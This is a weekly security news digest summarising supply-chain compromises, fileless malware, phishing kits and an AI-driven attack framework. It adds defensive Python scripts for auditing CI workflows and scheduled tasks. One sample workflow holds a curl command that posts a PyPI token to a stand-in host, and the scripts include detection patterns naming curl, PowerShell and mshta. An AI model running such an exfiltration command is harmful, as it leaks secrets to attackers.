This week feels like a greatest hits album of “what could possibly go wrong.” We’ve got npm packages with 2 billion total downloads getting phished, a Chinese APT sneaking around entirely in memory, and AI-branded apps that look shiny and good, actually do what they are supposed to, but turn out to be pure malware. Kind of starting to feel like this is an impossible fight …

P.S. If you get value out of this summary, make sure to subscribe to it via e-mail (scroll down) or we also publish it on our LinkedIn every Monday.

1. Massive npm Supply Chain Attack Compromises 18 Packages with 2 Billion Weekly Downloads

On September 8, attackers phished a maintainer via a spoofed npm support email and injected obfuscated, browser‐based malware into 18 high-use npm packages — chalk, debug, ansi-styles and others totaling 2 billion weekly downloads. The code hooks into Web3/browser APIs to silently rewrite cryptocurrency transaction destinations, redirecting funds to attacker-controlled wallets; actual theft was under $1,000. 

Key Details

  • Compromised packages include chalk (300 M), debug (358 M), ansi-styles (371 M).
  • Phishing domain “[censored].help” mimicked npmjs.org to steal 2FA credentials
  • Malware hooks fetch, XMLHttpRequest, window.ethereum, etc., to swap wallet addresses
  • Aikido detected and disclosed the breach within minutes; theft tracked at ~$970

Read more at Aikido Security, CSO Online


2. Chinese APT Deploys EggStreme Fileless Malware Against Philippine Military Contractor

Security researchers at Bitdefender uncovered EggStreme, a novel fileless malware framework used by a China-linked APT to infiltrate a Philippine military company over a year-long espionage campaign. EggStreme’s core backdoor, EggStremeAgent, executes entirely in memory: it is loaded via DLL sideloading and provides keylogging and gRPC-based C2 communications, enabling stealthy reconnaissance, lateral movement, and data theft.

Key Details

  • EggStremeAgent supports 58 commands – including system profiling, shellcode execution, and an injected keylogger tracking keystrokes and clipboard data.
  • Malware uses legitimate Windows services and DLL sideloading to load encrypted modules into memory, leaving no decrypted payloads on disk.
  • All C2 traffic uses encrypted gRPC channels, and attackers maintain fallback servers for resilience.

Read more at Bitdefender, The Record


3. EvilAI Malware Uses AI-Driven Fake Productivity Apps to Evade Detection

A new campaign tracked as "EvilAI" hides Trojan-style malware inside fully functional, AI-branded tools with realistic UIs and valid digital signatures. In just one week, Trend Micro has spotted hundreds of organizations across manufacturing, government, healthcare and more infected via search ads, social media and fake vendor portals.  EvilAI apps perform normal tasks while mapping environments, disabling browsers and security products, then laying groundwork for future payloads—leaving static antivirus defenses blind to their activity.  

Key Details

  • Operators created new “disposable” companies to get code-signing certificates for apps like Recipe Maker and Manual Finder.
  • Distribution via malicious search-engine ads, promoted links and counterfeit vendor sites.
  • After install, apps scan for installed AV/EDR, kill Edge/Chrome processes and disable Bitdefender, Kaspersky and Fortinet products.
  • Uses control-flow flattening, anti-analysis loops and registry/scheduled-task persistence to thwart signature scanners.

Next Steps

  • Enforce application allow-listing for unapproved tools.
  • Share this with your organisation as an example that even very legitimate-looking apps can be malicious.
  • Validate digital certificates against known trusted vendors.

Read more at Trend Micro, Dark Reading


4. GhostAction campaign exfiltrates 3,325 secrets via malicious GitHub Actions workflows

Attackers injected a rogue GitHub Actions workflow into the FastUUID project on September 2, harvesting 3,325 secrets from 817 repositories, including PyPI, npm, DockerHub, AWS, Cloudflare and GitHub tokens, before being contained on September 5. 

Key Details

  • Malicious workflow introduced by “Grommash9” on Sep 2 in the FastUUID repository
  • Campaign spread to 817 repos, affecting 327 users and exfiltrating secrets via HTTP POST to a single endpoint
  • Stolen tokens span PyPI, npm, DockerHub, GitHub, Cloudflare API, AWS access keys and database credentials
  • GitGuardian contained the attack on Sep 5. 573 projects notified; 9 npm and 15 PyPI packages still at risk

Next Steps

  • Audit all GitHub Actions workflows for unauthorized changes
  • Rotate and revoke any potentially exposed tokens immediately
  • Enforce least-privilege permissions on CI/CD secrets and workflows
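
An added example (not from the cited reports) of the workflow audit above: it flags any step that both references a secret and sends data over HTTP to a host outside an allowlist, the exfiltration pattern described in the Key Details. The allowlist, the sample workflow and the `.invalid` host are constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Assumption: hosts this organisation's workflows legitimately call with a secret.
ALLOWED_HOSTS = {"api.github.com", "upload.pypi.org"}

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
SENDER = re.compile(r"\b(?:curl|wget|Invoke-WebRequest|Invoke-RestMethod)\b")
URL = re.compile(r"https?://[^\s\"']+")
STEP_START = re.compile(r"^[ \t]*-\s+(?:name|uses|run|id|env):", re.M)

def split_steps(text):
    """Cut a workflow into per-step chunks at each '- name:/uses:/run:' list item."""
    starts = [m.start() for m in STEP_START.finditer(text)]
    return [text[a:b] for a, b in zip(starts, starts[1:] + [len(text)])]

def audit_workflow(text, allowed=ALLOWED_HOSTS):
    """Flag steps that read a secret and send data to a host outside the allowlist."""
    findings = []
    for step in split_steps(text):
        secrets = sorted(set(SECRET_REF.findall(step)))
        if not secrets or not SENDER.search(step):
            continue
        hosts = {urlparse(u).hostname for u in URL.findall(step)}
        unknown = sorted(h for h in hosts if h and h not in allowed)
        if not hosts:
            unknown = ["<no literal URL>"]  # destination built at runtime: review by hand
        if unknown:
            label = step.strip().splitlines()[0]
            findings.append({"step": label, "secrets": secrets, "hosts": unknown})
    return findings

# Constructed sample workflow; step names and the .invalid host are made up.
SAMPLE_WORKFLOW = """\
jobs:
  build:
    steps:
      - uses: actions/checkout@v4
      - name: Publish
        env:
          PYPI_API_TOKEN: ${{ secrets.PYPI_API_TOKEN }}
        run: curl -s -X POST -d "t=$PYPI_API_TOKEN" https://collector.example.invalid/in
      - name: Notify
        run: curl -H "Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}" https://api.github.com/
"""

if __name__ == "__main__":
    for finding in audit_workflow(SAMPLE_WORKFLOW):
        print(finding)
```

Run it over every file under `.github/workflows/` and diff the findings between commits; a new finding in a pull request is the change to review.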

Read more at CSO Online


5. Legacy OAuth Tokens in SalesLoft-Drift Deal Expose Fourth-Party Risk

A recent breach of SalesLoft’s acquired Drift chat platform abused dormant OAuth tokens—some inactive for over 18 months—to pivot into customer Salesforce and Google Workspace environments. The incident underscores “fourth-party” risk, where organizations inherit unseen integrations and permissions through vendor M&A, greatly expanding their attack surface beyond traditional third-party controls.

Key Details

  • Attackers leveraged active Drift OAuth tokens to access hundreds of Salesforce instances and some Google Workspace accounts.
  • Tokens likely predated SalesLoft’s February 2024 acquisition of Drift and remained valid until explicitly revoked.
  • Traditional vendor assessments rarely track a supplier’s acquisition history or inherited OAuth access.

Next Steps

  • Start monitoring M&A activity involving your high-risk vendors (set up a Google Alert)

Read more at CSO Online


6. Compromised ScreenConnect Used to Deploy Fileless AsyncRAT via In-Memory Loader

Security researchers at LevelBlue Labs uncovered a fileless attack chain that leverages a compromised ScreenConnect client to load AsyncRAT entirely in memory, bypassing disk-based defenses. The multi-stage VBScript and PowerShell loader uses .NET reflection, AMSI/ETW disabling, and a disguised scheduled task for persistence, exposing organizations to credential theft and full remote control.

Key Details

  • Initial access via unauthorized ScreenConnect relay at relay.shipperzone.online
  • Update.vbs script runs PowerShell to fetch two .NET payloads (`logs.ldk`, `logs.ldr`) into memory
  • Loader assembly patches AMSI and ETW, then invokes secondary AsyncRAT assembly via reflection
  • Persistence achieved by a scheduled task named “Skype Update”; C2 config encrypted with AES-256 linking to DuckDNS server

Next Steps

  • Alert on scheduled tasks using updater-style names and monitor AMSI/ETW modifications

Read more at CSO Online


7. VoidProxy PhaaS Uses AitM Phishing to Bypass MFA on Microsoft, Google Accounts

Okta researchers discovered VoidProxy, a phishing-as-a-service platform using Adversary-in-the-Middle techniques to intercept passwords, MFA codes, and session tokens from Microsoft and Google login flows. The scalable, multi-layered attack bypasses SMS and OTP protections, leveraging disposable domains and Cloudflare defenses to evade email filters and security tools.

Key Details

  • Phishing emails sent from compromised ESP accounts redirect through URL shorteners and multiple Cloudflare-protected domains.
  • Users face a CAPTCHA check then a perfect replica of Microsoft or Google login pages; automated scanners see only a benign “Welcome” page.
  • VoidProxy’s reverse proxy captures credentials, MFA codes, and session cookies, enabling attackers to hijack validated sessions.
  • Anti-analysis measures include dynamic DNS, disposable low-cost TLDs, and Cloudflare Workers to mask infrastructure.

Next Steps

  • Consider enforcing phishing-resistant authenticators (passkeys, security keys) for more employees.

Read more at CSO Online


8. New Salty2FA Phishing Kit Evolves to Enterprise-Grade, Bypasses MFA

Salty2FA phishing kit now uses advanced subdomain rotation, dynamic branding, multiple MFA simulations and anti-research tactics to mimic enterprise software. Static IOCs and traditional defenses fail against these enterprise-grade phishing campaigns.

Key Details

  • Rotates subdomains every session to evade blacklists and tracking
  • Auto-applies authentic corporate branding for six different MFA flows
  • Leverages legitimate platforms (e.g., Aha.io trial) to host phishing lures
  • Uses geo-blocking, ASN/IP filtering and JavaScript anti-debugging

Read more at Dark Reading


9. Apple Debuts Memory Integrity Enforcement in iPhone 17 and iPhone Air to Counter Mercenary Spyware

Apple’s upcoming iPhone 17 and iPhone Air will ship with Memory Integrity Enforcement (MIE), a hardware-and-firmware feature that enforces real-time memory tagging to block buffer overflows and use-after-free exploits. By integrating Enhanced Memory Tagging Extension (EMTE) in the new A19 and A19 Pro chips, Apple raises the bar for mercenary spyware developers, making zero-click exploit chains costlier and harder to build and offering customers industry-first, always-on memory safety without performance impact.

Read more at Cybersecurity News


10. AI-Powered Villager Framework Automates Advanced Attacks via Kali Linux and DeepSeek AI

Villager is a new AI-driven penetration testing framework that integrates Kali Linux tools with DeepSeek AI to fully automate multi-stage cyber attacks. Distributed via PyPI with self-destructing containers and randomized SSH ports, it lowers the skill barrier for sophisticated intrusions and compresses detection and response windows for enterprises.

Key Details

  • Developed by China-based Cyberspike and released on PyPI in July 2025, Villager hit over 10,000 downloads in two months.
  • Uses a Model Context Protocol (MCP) client on port 25989 with a database of 4,201 AI prompts to orchestrate exploits.
  • Spawns isolated Kali Linux containers for scanning and assessment, auto-wiping logs after 24 hours and rotating SSH ports.
  • Integrates DeepSeek AI (“al-1s-20250421” model via HTTP API) to adapt attack steps, e.g., launching WPScan on WordPress targets.

Read more at Cybersecurity News


11. ToneShell Backdoor Abuses Windows Task Scheduler COM Service for Stealthy Persistence

The latest ToneShell variant leverages the Windows Task Scheduler COM interfaces to create a one-minute recurring task, ensuring its payload runs continuously from %APPDATA%, bypassing registry run-key detections.  

Delivered via sideloaded DLLs in themed archives, it evades sandbox checks and blends into the user profile structure, complicating discovery by traditional file-based or service-installation heuristics.

Key Details

  • Archives contain a legitimate loader and a renamed malicious DLL that probes for sandbox artifacts.
  • Backdoor copies itself and Visual C++ runtime libraries to a new subfolder under %APPDATA% to avoid scrutiny.
  • Uses ITaskService and IRegisteredTask COM interfaces to register a “dokanctl” scheduled task in the root folder.
  • The task runs %APPDATA%\svchosts.exe every minute, masquerading as a legitimate Windows process.

Next Steps

  • Audit root-folder tasks for unexpected names or executables in %APPDATA%.
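
One way to run the scheduled-task checks from items 6 and 11, as an added example rather than code from the cited research: it reads one task's XML definition (the format `schtasks /query /tn <name> /xml` prints) and reports actions in user-writable paths, repetition of five minutes or less, and updater-style names attached to script hosts. The regex lists and the five-minute threshold are assumptions; the sample task is constructed from the ToneShell details above.

```python
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
USER_WRITABLE = re.compile(r"%(?:local)?appdata%|%temp%|\\appdata\\|\\users\\public\\", re.I)
UPDATER_NAME = re.compile(r"updat", re.I)
SCRIPT_HOST = re.compile(r"(?:powershell|pwsh|wscript|cscript|mshta)(?:\.exe)?\"?\s*$", re.I)
DURATION = re.compile(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")

def interval_seconds(iso):
    """Convert a task Repetition/Interval such as PT1M to seconds; None if absent."""
    m = DURATION.match(iso or "")
    if not m or not any(m.groups()):
        return None
    d, h, mi, s = (int(g or 0) for g in m.groups())
    return ((d * 24 + h) * 60 + mi) * 60 + s

def audit_task(xml_text):
    """Return the task's name, command, root-folder status and reasons for review."""
    root = ET.fromstring(xml_text)
    uri = root.findtext("t:RegistrationInfo/t:URI", "", NS)
    cmd = root.findtext("t:Actions/t:Exec/t:Command", "", NS)
    every = interval_seconds(root.findtext(".//t:Repetition/t:Interval", None, NS))
    reasons = []
    if USER_WRITABLE.search(cmd):
        reasons.append("action runs from a user-writable path")
    if every is not None and every <= 300:
        reasons.append(f"repeats every {every}s")
    if UPDATER_NAME.search(uri) and (SCRIPT_HOST.search(cmd) or USER_WRITABLE.search(cmd)):
        reasons.append("updater-style name on a script host or user-writable path")
    # Root folder is context, not a verdict: many legitimate tasks live there.
    return {"task": uri, "command": cmd,
            "root_folder": uri.count("\\") == 1, "reasons": reasons}

# Constructed sample using the task name, path and interval reported for ToneShell.
SAMPLE_TASK = r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\dokanctl</URI></RegistrationInfo>
  <Triggers><TimeTrigger><Repetition><Interval>PT1M</Interval></Repetition></TimeTrigger></Triggers>
  <Actions><Exec><Command>%APPDATA%\svchosts.exe</Command></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    print(audit_task(SAMPLE_TASK))
```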

Read more at Cybersecurity News

